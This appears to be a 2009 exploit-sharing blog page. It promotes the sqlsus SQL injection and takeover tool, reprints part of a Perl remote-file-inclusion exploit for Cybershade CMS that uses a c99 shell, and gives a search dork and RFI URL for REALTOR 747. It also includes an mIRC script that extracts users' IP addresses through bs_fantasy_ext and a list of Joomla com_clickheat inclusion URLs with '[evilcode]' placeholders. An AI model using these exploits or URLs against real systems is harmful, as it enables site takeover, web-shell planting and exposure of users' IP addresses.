Posted by: Bug Dork on: March 28, 2009
sqlsus is an open source MySQL injection and takeover tool, written in perl.
Via a command line interface that mimics a mysql console, you can retrieve the database structure, inject a SQL query, download files from the web server, upload and control a backdoor, and much more…
It is designed to maximize the amount of data gathered [...]
Posted by: Bug Dork on: January 18, 2009
#!/usr/bin/perl
####################################################################
# Cybershade CMS 0.2b (index.php) RFI shell_cmd[c99] Exploit
# url: http://sourceforge.net/projects/cybershadecms/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com
# team: Spanish Hackers Team – [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# “need” register_globals = On
#
# RFI vuln!: [index.php]
# [...]
Posted by: Bug Dork on: January 18, 2009
vul:/include/define.php line 51:
require_once( “$INC_DIR/define_area.php” );
——————————————————
dork:”REALTOR 747 – Version 4.11″
—————————————————–
xpl:
http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]
Posted by: Bug Dork on: January 11, 2009
Exploit Code :
; bs_fantasy_ext <= 1.1.16 Exploit by Phil
; Kudos to MattT for pointing this out
; Only seems to work for non-vhosted unresolved IPs
; Code is a little inefficient, sorry.
; Usage: /getip <channel> <nickname> <bs bot nickname>
alias getip {
if ($1 != $null && $2 != $null && $3 != $null) {
set %exploit.channel $1
set %exploit.nickname [...]
Posted by: Bug Dork on: January 4, 2009
Vulnerable file
administrator/components/com_clickheat/install.clickheat.php
require_once($GLOBALS['mosConfig_absolute_path'].
‘/administrator/components/com_clickheat/Recly_Config.php’);
administrator/components/com_clickheat/includes/heatmap/_main.php
require_once( $mosConfig_absolute_path .
‘/components/Recly/Clickheat/Clickheat_Heatmap.php’ );
administrator/components/com_clickheat/includes/heatmap/main.php
require_once( $mosConfig_absolute_path .
‘/components/Recly/Clickheat/Clickheat_Heatmap.php’ );
administrator/components/com_clickheat/includes/overview/main.php
require_once( $mosConfig_absolute_path .
‘/components/Recly/Clickheat/Clickheat_Overview.php’ );
administrator/components/com_clickheat/Recly/Clickheat/Cache.php
require_once( $GLOBALS['mosConfig_absolute_path'] .
‘/components/Recly/common/Logger.php’);
administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.ph
p
require_once( $GLOBALS['mosConfig_absolute_path'] .
‘/components/Recly/common/Logger.php’);
administrator/components/com_clickheat/Recly/common/GlobalVariables.php
require_once($GLOBALS['mosConfig_absolute_path'].’/components/Recly/common/
String.php’);
[o] Exploit
http://localhost/[path]/administrator/components/com_clickheat/install.clic
kheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/hea
tmap/_main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/hea
tmap/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/ove
rview/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickh
eat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickh
eat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/common
/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
Komentar Anda